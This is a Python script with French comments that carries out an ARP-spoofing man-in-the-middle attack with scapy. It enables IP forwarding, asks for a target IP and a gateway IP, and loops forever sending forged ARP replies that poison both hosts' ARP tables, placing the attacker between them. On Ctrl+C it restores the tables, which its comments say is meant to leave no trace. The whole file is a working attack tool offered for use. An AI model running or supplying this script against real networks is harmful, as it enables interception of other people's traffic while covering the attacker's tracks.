
# Ce programme a pour but d'effectuer une attaque de l'homme du milieu.
# Pour faire fonctionner ce programme sous Linux, nous exécutons grâce au module os de Python la commande pour activer l'IP forward dans le terminal.
# Ensuite, nous demandons l'IP de la cible et l'IP de la passerelle par défaut (ou bien un autre hôte du réseau si nous le voulons).
# Le script va donc envoyer deux réponses ARP : une à la passerelle où nous usurpons l'IP de la cible et inversement,
# et cela en effectuant une boucle infinie pour garder la connexion opérationnelle.
# Cela aura pour conséquence de modifier leur table ARP en changeant les adresses MAC des deux cibles par l'adresse MAC de l'attaquant,
# et donc de nous placer entre les deux machines du réseau.
#
# Le script s'arrête en faisant un CTRL + C, ce qui va entraîner la restauration des tables ARP des deux cibles pour ne laisser aucune trace.


from scapy.all import ARP, send, getmacbyip
import time
import os



ROUGE = '\033[91m'
VERT = '\033[92m'
RESET = '\033[0m'
     

print(f"""{VERT}
  __  __          _   _       _____ _   _ 
 |  \/  |   /\   | \ | |     |_   _| \ | |
 | \  / |  /  \  |  \| |       | | |  \| |
 | |\/| | / /\ \ | . ` |       | | | . ` |
 | |  | |/ ____ \| |\  |      _| |_| |\  |
 |_|  |_/_/    \_\_| \_|     |_____|_| \_|
                                          
                                          
  _______ _    _ ______       __  __ _____ _____  _____  _      ______ 
 |__   __| |  | |  ____|     |  \/  |_   _|  __ \|  __ \| |    |  ____|
    | |  | |__| | |__        | \  / | | | | |  | | |  | | |    | |__   
    | |  |  __  |  __|       | |\/| | | | | |  | | |  | | |    |  __|  
    | |  | |  | | |____      | |  | |_| |_| |__| | |__| | |____| |____ 
    |_|  |_|  |_|______|     |_|  |_|_____|_____/|_____/|______|______|


{RESET}---> CTRL + C pour arreter le script

""")


os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")

Ip_cible = input("Veuillez entrer l'adresse IP de la cible : ")
Mac_cible = getmacbyip(Ip_cible)
Ip_passerelle = input("Veuillez entrer l'adresse IP de la passerelle : ")
Mac_passerelle= getmacbyip(Ip_passerelle)

def usurpation(Ip_dst, Mac_dst,Ip_usurpé):
    packet=ARP(op=2, pdst=Ip_dst, hwdst= Mac_dst, psrc= Ip_usurpé)
    send(packet)
    print(Ip_dst)

def restoration_ARP(Ip_dst, Ip_src, Mac_src):
    packet=ARP(op=2, pdst= Ip_dst, psrc= Ip_src, hwsrc= Mac_src )
    send(packet, count=4, verbose=False)



try:
    
    while True:
        usurpation(Ip_cible,Mac_cible,Ip_passerelle)
        usurpation(Ip_passerelle,Mac_passerelle,Ip_cible)
        time.sleep(1)
        
except KeyboardInterrupt:
    restoration_ARP(Ip_cible, Ip_passerelle, Mac_passerelle)
    restoration_ARP(Ip_passerelle, Ip_cible, Mac_cible)
    print(" Tables ARP restoré.")
